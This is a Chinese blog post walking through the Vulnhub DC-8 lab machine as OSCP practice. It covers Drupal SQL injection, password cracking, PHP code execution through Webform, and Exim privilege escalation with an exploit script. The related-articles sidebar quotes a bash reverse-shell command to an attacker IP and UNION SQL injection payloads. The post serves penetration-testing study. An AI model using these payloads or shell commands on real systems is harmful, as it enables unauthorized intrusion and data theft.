oscp——DC-8

最新推荐文章于 2023-03-21 12:08:35 发布
最新推荐文章于 2023-03-21 12:08:35 发布
阅读量324 收藏
点赞数
分类专栏: oscp
本文为博主原创文章,未经博主允许不得转载,未授权转载为侵权行为,违反法律。
本文链接:https://blog.csdn.net/qq_36869808/article/details/104254680
版权

0x00 前言

这个是第28台机子,这个机子的难度实际并不是很大,只是很多东西都没有接触过。

0x01 信息收集

在这里插入图片描述
在这里插入图片描述

0x02 Web

访问一下目标页面
在这里插入图片描述
扫目录,发现一个0的文件
在这里插入图片描述
打开之后发现是一个drupal的站
在这里插入图片描述
这里发现一个nid的参数,试一下sql注入
在这里插入图片描述
存在sql注入
在这里插入图片描述
找到密码
在这里插入图片描述
用john跑出来了一个密码
在这里插入图片描述
找到登录页面进行登录,登录之后选择contact us,然后点击Webform
在这里插入图片描述
然后点击Form settings
在这里插入图片描述
切换php code
在这里插入图片描述
填写内容进行提交
在这里插入图片描述
这里有一个坑啊,必须要在shell前面加一些字母啥的,,,才能被执行
在这里插入图片描述
这里有一个奇怪的东西
在这里插入图片描述
搜一下版本
在这里插入图片描述
找到了一个权限提升
在这里插入图片描述
wget 上去发现无法执行
在这里插入图片描述
查看之后发现是一个dos
在这里插入图片描述
这里改成unix,使用 ./46996.sh -m netcat进行提权
在这里插入图片描述
拿到 flag
在这里插入图片描述

0x03 总结

  • dp 提权
  • exim提权
王嘟嘟_
关注
专栏目录
OSCP-课外2(git泄露、SQL注入)
墨痕诉清风的博客
02-23 306
id=0'+union+select+1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_name='ssh'--+,查到列名为id,pass,user。id=0'+union+select+1,2,table_name,4,5,6 from information_schema.tables where table_schema='darkhole_2'--+,查到表名为ssh。
OSCP靶场6-Stapler(用户收集、wordpress、SMB、mysql上传文件执行反弹shell、用户历史命令)
墨痕诉清风的博客
06-06 355
步骤 0:目标发现所以……和往常一样,让我们​​看看我们的目标在网络上的位置10.10.10.1 是 DHCP 服务器……让 10.10.10.2 成为“受害者”机器第 1 步:TCP 开放端口扫描为了速度,我们现在不会专注于版本扫描等……我们只是想看看有什么是活着的虽然有些端口看起来很明显,但还有一些其他端口,例如 '666' 被错误地表示为 'doom' - 这些只是特定端口号的 nmap 默认值。我们需要进行更详细的扫描,以查看真正活着的东西。第 2 步:TCP 主动端口扫描。
OSCP 2021攻略之旅--从小白到通过
ShadowBlade
08-08 2万+
发布此文章,能够让更多想学习通过OSCP的同学得到更好的指导。
oscp——DC-7
王嘟嘟的博客
02-10 573
0x00 前言 这个是第27台机子,这个机子个人以为还是有点费脑子的。 0x01 信息收集 0x02 Web 访问一下web页面 是一个Drupal的站 试了试我多个exp 都没用,最后看了提示才知道要去推特上找 Dc7User这个人 然后找到了这里,有一个账号密码 dc7user MdR3xOgB7#dW 这里成功登陆 看到有邮件提示 这里看到这个sh的内容 看到大佬说的 这...
oscp练习目录
王嘟嘟的博客
01-25 1万+
0x00 前言 这里将oscp所做的练习进行一个总结,并且将每一个题所需要的内容以及可以练习学习到的东西进行汇总。 0x01 vulnhub总览 题目 链接 文章链接 Me and My Girlfriend 1 https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/ https://blog.csdn.net/qq_36...
OSCP:OSCP考试材料
05-01
OSCP Linkedin: : 电子邮件:
Vulnhub靶机实战——DC-6
冠霖L的博客
10-28 3915
靶机DC-6下载地址:https://download.vulnhub.com/dc/DC-6.zip 环境:VMware 15虚拟机软件 DC-6靶机IP地址:192.168.220.139 Kali的IP地址:192.168.220.142 DC-6靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.142...
DC-6渗透测试记录——超详细
m0_64312309的博客
09-12 147
本文是DC6靶机渗透测试的详细教程
[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
杨秀璋的专栏
04-10 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可能利用此漏洞远程无需用户验证,执行恶意代码并获取机器的完全控制。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。由于hack the box速度堪忧,作者选择了Vulnhub靶场,希望深入分析来
【原创】Ichunqiu云境 —— Endless(无间计划) Writeup
WUfagg的博客
03-21 844
Author:小离-xiaoli。
OSCP认证学习资源汇总.zip
08-19
0x0001-OSCP学习资料PWK v1.15-带书签 0x0002-OSCE学习资料-CPTV 1.0 0x0003-OSCP考试命令大全 0x0004-INE机构OSCP课程 0x0005-bof真题文件 0x0006-缓冲区溢出题目全套解决方案 0x0007-OSCP报告模板参考 0x0008-题型及答题技巧 0x0009-windows提权笔记 0x0011-lab报告模板 0x0013-考试报告模板_v1 0x0014-考试报告模板_v2 0x0020-国外培训视频 windows提权笔记
OSCP证书考试总结与终身学习 - 带你走上 OSCE3
0pr
08-25 1万+
终于有点时间写些东西了。这半年来一直在准备 Offensive Security 的各种考试,内容太多。直到昨天,也就是8月24日,我完成了第二轮 OSEP 的 Lab,心里踏实多了,等着9月4日考试的同时,也想做个小结,谈谈我拿 OSCP 的历程以及今后的目标。希望可以为想考取 OSCP 的同学指明一些道路。
OSCP考试回顾
weixin_30815469的博客
05-15 2486
技术背景 从2011年开始接触学习渗透测试,全职做过的职位有渗透测试,Python后端研发,DevOps,甲方安全打杂. 学习过程 首先考试报名,交钱。买了价值800美元的一个月lab,包含Pentest with Kali的视频教程和一个PDF还有一次考试费用。视频教程和PDF介绍了一些常见工具,没有其他。 3月报名,买了一个月Lab,Lab环境需要预约,最早能预约到报名时间2周后的。 关于OS...
oscp——Kioptrix: Level 1.1 (#2)
王嘟嘟的博客
02-20 1278
0x00 前言 第三十二台机子 0x01 信息收集 0x02 Web80-webshell 访问页面之后发现是一个登录页面,这种页面看起来就像是一个SQL注入,试一下万能密码 成功进入后台,可以看到是一个执行ping命令的执行窗口 这里反弹一下shell,这里使用 bash -i >& /dev/tcp/192.168.0.111/1234 >&1 然后在/...
oscp认证考试指南
热门推荐
qq_34304107的博客
02-18 2万+
目录简介第一节: 考试要求文档要求Exploit 代码考试证据控制面板提交截图要求考试限制Metasploit 限制第二节:考试信息考试网络连接考试控制板靶机快照恢复考试中proof文件分值分配取消得分建议使用的报告模板奖励积分网络连接问题联系方式提交说明提交格式和名称压缩文件提交上传收到确认书其他必要信息结果常见问题 简介 这份指南以解释oscp认证考试为目的。第一部分描述考试前需要准备的工具等...
oscp——SecOS: 1
王嘟嘟的博客
03-01 1506
0x00 目标资料 38 链接 https://www.vulnhub.com/entry/secos-1,88/ 难度推荐 3 思路 1 web——usershell 1 usershell——rootshell 1 环境搭建 VMbox 0x01 信息收集 IP 端口 0x02 Web——Usershell 拿到之后,访问一下8081端口 然后看到一个注册的界面,进行用户的注册,...
[经验分享] OSCP 渗透测试认证
weixin_34186931的博客
11-17 4757
http://f4l13n5n0w.github.io/blog/2015/05/05/jing-yan-fen-xiang-oscp-shen-tou-ce-shi-ren-zheng/   “120天的旅程即将结束,以一场历时24小时没有选择题的考试,收获屠龙路上第一座里程碑。…” 这是我通过OSCP认证考试时,第一时间的感受。自豪和欣喜之情不亚于2008年我拿下CCIE R&S的...
OSCP考试指南————考试要求详情
weixin_70101757的博客
05-10 5409
OSCP 认证考试模拟私有 VPN 中的实时网络,其中包含少量易受攻击的机器。 您有 23 小时 45 分钟的时间完成考试。 这意味着如果您的考试在北京标准时间 09:00 开始,您的考试将在第二天北京标准时间 08:45 结束。 考试结束后,您将有另外 24 小时的时间上传您的文件。下面提供了有关如何提交文件的详细信息。 所有 OSCP 考试都有监考。 第 1 部分:考试要求详情 考试包括 3个独立目标和 1个 Active Directory集(2个客户端 + 1个域控制器) 每个目.
OSCP 备考指南
anlalu233的博客
03-14 1249
OSCP 备考指南https://www.lshack.cn/656/
oscp 2023 challenge writeup-medtech-csdn博客
最新发布
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

王嘟嘟_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值